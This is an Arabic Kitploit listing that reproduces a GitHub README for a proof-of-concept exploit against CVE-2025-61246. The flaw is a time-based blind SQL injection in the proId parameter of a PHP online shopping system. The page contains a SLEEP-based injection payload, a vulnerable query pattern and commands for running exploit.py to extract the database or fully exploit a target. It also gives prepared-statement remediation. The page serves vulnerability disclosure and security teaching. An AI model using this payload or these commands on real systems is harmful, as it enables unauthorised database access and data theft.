Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-61246 — CVE-2025-61246: PoC لثغرة حقن SQL في نظام التسوق عبر الإنترنت PHP | Kitploit
أدوات/GitHubGitHub/hackergovind/cve-2025-61246
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubhackergovind/cve-2025-61246

CVE-2025-61246

CVE-2025-61246: PoC لثغرة حقن SQL في نظام التسوق عبر الإنترنت PHP

عرض المستودع
منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-61246 - ثغرة حقن SQL في نظام التسوق عبر الإنترنت

CVE Severity CVSS

نظرة عامة

يحتوي هذا المستودع على إثبات المفهوم (PoC) لثغرة CVE-2025-61246، وهي ثغرة حقن SQL حرجة تم اكتشافها في تطبيق Online Shopping System المبني على PHP. تسمح هذه الثغرة لمهاجم غير مصادَق بتنفيذ أوامر SQL عشوائية عبر حقن SQL الأعمى القائم على الوقت (Time-Based Blind SQL Injection).

تفاصيل الثغرة

  • CVE ID: CVE-2025-61246
  • نوع الثغرة: حقن SQL (أعمى قائم على الوقت)
  • المكوّن المتأثر: /online-shopping-system-php-master/review_action.php
  • الإصدار المتأثر: 1.0
  • المعامل القابل للاستغلال: proId
  • ناقل الهجوم: الشبكة (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
  • الخطورة: حرجة (درجة CVSS: 9.8)
  • مكتشف الثغرة: Govind Pratap Singh

الوصف الفني

توجد الثغرة في نقطة النهاية review_action.php حيث يتم دمج المدخلات التي يوفّرها المستخدم من المعامل proId مباشرةً في استعلامات SQL دون تعقيم مناسب أو استخدام استعلامات مُعلَّمة. وهذا يسمح للمهاجم بحقن حمولات SQL خبيثة يمكنها:

  • استخراج معلومات حساسة من قاعدة البيانات
  • تجاوز آليات المصادقة
  • تعديل أو حذف سجلات قاعدة البيانات
  • تنفيذ عمليات إدارية

نمط الكود القابل للاستغلال

root@kitploit:~
// Vulnerable code (example)
$proId = $_POST['proId'];
$query = "SELECT * FROM products WHERE id = " . $proId;
mysqli_query($conn, $query);

نواقل الهجوم

يمكن للمهاجم استغلال هذه الثغرة من خلال:

  1. إرسال طلب POST مخصص إلى /online-shopping-system-php-master/review_action.php
  2. تضمين حمولة SQL خبيثة في المعامل proId
  3. استخدام تقنيات حقن SQL الأعمى القائم على الوقت لاستخراج البيانات
  4. استغلال الثغرة للحصول على وصول غير مصرح به إلى قاعدة البيانات

مثال على الحمولة

root@kitploit:~
proId=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -

إثبات المفهوم

يتضمن هذا المستودع:

  1. سكربت الاستغلال الآلي (exploit.py) - سكربت بايثون لاكتشاف الثغرة واستغلالها
  2. دليل الاختبار اليدوي (MANUAL_TESTING.md) - تعليمات خطوة بخطوة للاستغلال اليدوي
  3. إعداد التطبيق القابل للاستغلال (docker-compose.yml) - بيئة Docker للاختبار الآمن
  4. دليل المعالجة (REMEDIATION.md) - ممارسات البرمجة الآمنة والتصحيحات

التثبيت والاستخدام

المتطلبات الأساسية

root@kitploit:~
Python 3.7+
pip install -r requirements.txt

البدء السريع

root@kitploit:~
# Clone the repository
git clone https://github.com/hackergovind/CVE-2025-61246.git
cd CVE-2025-61246

# Install dependencies
pip install -r requirements.txt

# Run the exploit
python exploit.py --url http://target.com/online-shopping-system-php-master/review_action.php

الاستخدام المتقدم

root@kitploit:~
# Detection only (no exploitation)
python exploit.py --url http://target.com/review_action.php --detect-only

# Extract database name
python exploit.py --url http://target.com/review_action.php --extract-db

# Full exploitation with custom timeout
python exploit.py --url http://target.com/review_action.php --timeout 10 --full-exploit

# Use proxy for testing
python exploit.py --url http://target.com/review_action.php --proxy http://127.0.0.1:8080

الأثر

يمكن أن يؤدي الاستغلال الناجح لهذه الثغرة إلى:

  • اختراق البيانات: استخراج معلومات المستخدمين الحساسة وبيانات الاعتماد وبيانات الدفع
  • تجاوز المصادقة: وصول غير مصرح به إلى الوظائف الإدارية
  • التلاعب بالبيانات: تعديل أو حذف سجلات قاعدة البيانات الحرجة
  • اختراق كامل للنظام: احتمالية تنفيذ كود عن بُعد في بعض الإعدادات

المعالجة

إجراءات فورية

  1. تطبيق التحقق من المدخلات: تنفيذ تحقق صارم من المدخلات لجميع البيانات المقدمة من المستخدم
  2. استخدام الاستعلامات المُعلَّمة: استبدال SQL الديناميكي بعبارات جاهزة (prepared statements)
  3. تنفيذ قواعد WAF: نشر قواعد جدار حماية تطبيقات الويب لمنع محاولات حقن SQL
  4. تحديث التطبيق: تطبيق أحدث التصحيحات الأمنية

مثال على الكود الآمن

root@kitploit:~
// Secure implementation using prepared statements
$proId = $_POST['proId'];
$stmt = $conn->prepare("SELECT * FROM products WHERE id = ?");
$stmt->bind_param("i", $proId);
$stmt->execute();
$result = $stmt->get_result();

للحصول على خطوات معالجة مفصلة، راجع REMEDIATION.md.

المراجع

  • OWASP SQL Injection
  • CWE-89: SQL Injection

إخلاء مسؤولية

⚠️ مهم: يُقدَّم إثبات المفهوم (PoC) هذا لأغراض تعليمية واختبارات أمنية مصرح بها فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. لا يتحمل المؤلف أي مسؤولية عن إساءة استخدام هذه المعلومات. احصل دائمًا على التصريح المناسب قبل الاختبار.

المؤلف

Govind Pratap Singh

  • GitHub: @hackergovind
  • Email: [email protected]
  • Medium: https://medium.com/@govindsinghpratap123

الترخيص

هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.

الشكر والتقدير

  • فريق تعيين CVE في MITRE
  • مؤسسة OWASP
  • مجتمع أبحاث الأمن

الإفصاح المسؤول: إذا اكتشفت ثغرة أمنية، يرجى الإبلاغ عنها بمسؤولية إلى البائع قبل الكشف العلني.

تنزيل الأداة